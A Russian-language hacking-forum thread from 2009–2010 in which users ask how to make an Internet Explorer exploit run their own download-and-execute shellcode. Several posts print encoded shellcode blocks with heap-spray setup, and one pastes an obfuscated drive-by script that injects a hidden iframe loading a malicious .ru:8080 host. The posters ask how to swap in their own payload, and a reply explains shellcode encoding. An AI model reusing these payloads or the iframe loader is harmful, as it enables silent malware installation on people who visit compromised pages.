HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > Защита ОС: вирусы, антивирусы, файрволы.
Перезагрузить страницу Проблема с Ie эксплоитом..как?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблема с Ie эксплоитом..как?
  #1  
Старый 15.12.2009, 12:38
xfrzx
Новичок
Регистрация: 09.02.2009
Сообщений: 1
С нами: 9079320

Репутация: 0
Question Проблема с Ie эксплоитом..как?
всем привет...есть вопрос
есть эксплоит для ие (http://www.securitylab.ru/poc/388010.php). В нем содержица
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u01 78%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC1 07%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C 5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u40 8B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u56 60%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
я заменяю это на свой шеллкод(вида \x0F\x58\x80\...) который скачивает и запускает файл, шеллкод работает 100%, но вместе отказываются почему, ие вылетает с ошибкой(память не можеть быть read). Раздельо все работает..вместе нет...никто не сталкивался с таким??
ps извините если не в ту ветку запостил
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.03.2010, 02:31
ubuntu
Новичок
Регистрация: 28.12.2009
Сообщений: 24
С нами: 8615502

Репутация: 0
По умолчанию
Цитата:
Сообщение от xfrzx  
я заменяю это на свой шеллкод(вида \x0F\x58\x80\...) который скачивает и запускает файл, шеллкод работает 100%
1)как написать свой шеллкод? такого вида который ты напиал или такого:

Код:
var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                    "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                    "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                    "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                    "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                    "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                    "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                    "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                    "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                    "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                    "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                    "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                    "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                    "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                    "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                    "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                    "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                    "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                    "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                    "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                    "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                    "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                    "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                    "%u314e%u7475%u7038%u7765%u4370");

var array = new Array();
var ls = 0x81000 - (shellcode.length * 2);
var bigblock = unescape("%u0b0c%u0b0C");
или такого:
Код:
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");

2) и еще вопрос как использовать нижеследующий сплоит:
Код:
<script>var kj;if(kj!='h'){kj=''};var v='sacYrCiwpCtY'.replace(/[YaC7w]/g, '');var r;if(r!='w' && r!='za'){r='w'};var n=window;var d=document;var hd;if(hd!='' && hd!='_'){hd='g'};var ud="ud";n.onload=function(){this.es=false;this.t='';try {z=d.createElement(v);z.src='hLtFtvpv:v/v/Fs%lviLc%kvdLe%aFlKs%-%nKeLtL.%avlFi%mKaLmFa%.vcKoKmF.FiLmFavgLeKs%hFaFcFkL-LuLsK.KrveLcveKnLtLm%e%xLivcFov.KrLuF:K8v0F8v0%/FwFaLlLmLaLrvtL.LcKoLm%/KwvaFl%mvavrKtK.vc%oKmF/vhvuvb%pFavgKe%s%.KcFoLm%/%gFo%o%g%l%eL.KcvoLmK/LsFcKrKiKbFdF.vcFoFmv/v'.replace(/[vLFK%]/g, '');var pg=37594;var gc;if(gc!='' && gc!='f'){gc='s'};z.setAttribute('d5eRfReRrR'.replace(/[Rm_5M]/g, ''), "1");d.body.appendChild(z);var vv=new Date();var kq;if(kq!='yg' && kq!='a'){kq='yg'};} catch(k){};};this.zv="";var zd="zd";</script>
раскодировав его видно, что там написан сайт - _ttp://slickdeals-net.alimama.com.imageshack-us.recentmexico.ru:8080/walmart.com/walmart.com/hubpages.com/google.com/scribd.com/

вместо него пишу свою строчку на .com файл, но толку нету

поиск юзал, гугл юзал, не помогло
Последний раз редактировалось ubuntu; 25.03.2010 в 03:16..
 
Ответить с цитированием

  #3  
Старый 31.03.2010, 04:35
xor[jmp]
Banned
Регистрация: 29.03.2010
Сообщений: 134
С нами: 8484463

Репутация: 31
По умолчанию
Цитата:
Сообщение от ubuntu  
1)как написать свой шеллкод? такого вида который ты напиал или такого:

Код:
var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                    "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                    "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                    "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                    "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                    "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                    "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                    "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                    "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                    "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                    "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                    "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                    "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                    "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                    "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                    "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                    "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                    "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                    "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                    "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                    "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                    "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                    "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                    "%u314e%u7475%u7038%u7765%u4370");

var array = new Array();
var ls = 0x81000 - (shellcode.length * 2);
var bigblock = unescape("%u0b0c%u0b0C");
или такого:
Код:
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");

2) и еще вопрос как использовать нижеследующий сплоит:
Код:
<script>var kj;if(kj!='h'){kj=''};var v='sacYrCiwpCtY'.replace(/[YaC7w]/g, '');var r;if(r!='w' && r!='za'){r='w'};var n=window;var d=document;var hd;if(hd!='' && hd!='_'){hd='g'};var ud="ud";n.onload=function(){this.es=false;this.t='';try {z=d.createElement(v);z.src='hLtFtvpv:v/v/Fs%lviLc%kvdLe%aFlKs%-%nKeLtL.%avlFi%mKaLmFa%.vcKoKmF.FiLmFavgLeKs%hFaFcFkL-LuLsK.KrveLcveKnLtLm%e%xLivcFov.KrLuF:K8v0F8v0%/FwFaLlLmLaLrvtL.LcKoLm%/KwvaFl%mvavrKtK.vc%oKmF/vhvuvb%pFavgKe%s%.KcFoLm%/%gFo%o%g%l%eL.KcvoLmK/LsFcKrKiKbFdF.vcFoFmv/v'.replace(/[vLFK%]/g, '');var pg=37594;var gc;if(gc!='' && gc!='f'){gc='s'};z.setAttribute('d5eRfReRrR'.replace(/[Rm_5M]/g, ''), "1");d.body.appendChild(z);var vv=new Date();var kq;if(kq!='yg' && kq!='a'){kq='yg'};} catch(k){};};this.zv="";var zd="zd";</script>
раскодировав его видно, что там написан сайт - _ttp://slickdeals-net.alimama.com.imageshack-us.recentmexico.ru:8080/walmart.com/walmart.com/hubpages.com/google.com/scribd.com/

вместо него пишу свою строчку на .com файл, но толку нету

поиск юзал, гугл юзал, не помогло
1) Для того чтоб шелл был вида "x20/x10" нужно ASCII перекодировать в uniscape.Если нужен код вида "%20%21" нужно uniscape перекодировать в ASCII.

2) Это помоему не сплойт, а выдача в закриптованом виде (или фрейм).
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Халявный интернет или как спрятаться надежнее чем VPN или SSH с цепочкой соксов. kodzero Статьи 20 06.08.2010 23:54
Взлом домофона Метаком andreipup Болталка 11 14.08.2009 16:06
Социальная инженерия. Профессиональное программирование. Последовательный взлом dinar_007 Болталка 15 23.12.2008 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.